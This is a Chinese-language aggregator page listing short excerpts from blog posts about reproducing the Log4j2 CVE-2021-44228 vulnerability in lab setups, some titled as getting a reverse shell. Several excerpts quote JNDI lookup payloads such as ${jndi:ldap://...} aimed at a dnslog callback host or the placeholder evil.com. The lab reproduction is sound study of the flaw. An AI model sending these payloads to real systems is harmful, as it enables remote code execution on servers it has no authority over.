原文:Apache Log4j2漏洞复现-反弹shell

X 引言 过年了,放炮 这个漏洞真牛逼,日天,日地,日空气 年 月 日凌晨,我正坐在马桶上,突然看到厕纸上面出现一串神秘代码 jndi:ldap: kao b ig.ns.dns .cf. ,我赶紧起身,打开电脑一看,网页dnslog弹出记录,我大惊,紧接着,我的手机,耳机,甚至我的台灯都弹出这串神秘代码。我踉跄的后退一步,心中默念,完了,完了,世界将长久苦于这串代码。 仅供学习参考,不得用于违 ...

2021-12-21 22:16 0 6937 推荐指数:

查看详情

Apache Log4j2漏洞复现

第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表 ...

Thu Dec 23 21:27:00 CST 2021 0 1116
Log4j2漏洞复现

二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看,也可以使用burp自带的dnslog进行查看,我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显,说明存在该漏洞 ...

Fri Dec 31 18:57:00 CST 2021 0 754
LOG4j2 漏洞复现

今天突然想码字,那就写一下log4j。 一、漏洞简介 1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含 ...

Mon Mar 14 05:45:00 CST 2022 0 1536
log4j2漏洞复现

参考链接 https://www.cnblogs.com/xuzhujack/p/15673703.html https://blog.csdn.net/weixin_44309905/artic ...

Mon Mar 21 08:59:00 CST 2022 0 982
apache log4j2 漏洞复现linux【纯详版】

本次记录自己测试时每一步操作,很详细。 本次复现分为curl测试和拿shell两种操作,测试完curl后体验时长到期了,只能换环境了。 本次测试环境如下: curl------------------------------------------------------ 靶场 ...

Mon Dec 13 23:23:00 CST 2021 0 2513
2021-log4j2漏洞复现CVE-2021-44228-反弹shell

2021-log4j2漏洞复现CVE-2021-44228 2021年12月15日 12:03 该漏洞是最近新爆出的漏洞能够远程执行 命令: 该镜像本地可以搭建环境: 1、拉取一个docker镜像 docker pull vulfocus ...

Wed Dec 15 21:30:00 CST 2021 0 2988
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)

漏洞简介 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意 ...

Fri Dec 31 04:58:00 CST 2021 0 1398
Apache Log4j2 CVE-2021-44228漏洞复现分析

前言 Log4j2是Java开发常用的日志框架,这次的漏洞是核弹级的,影响范围广,危害大,攻击手段简单,已知可能影响到的相关应用有 Apache Solr Apache Flink Apache Druid Apache Struts2 ...

Tue Jan 04 22:11:00 CST 2022 0 852
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM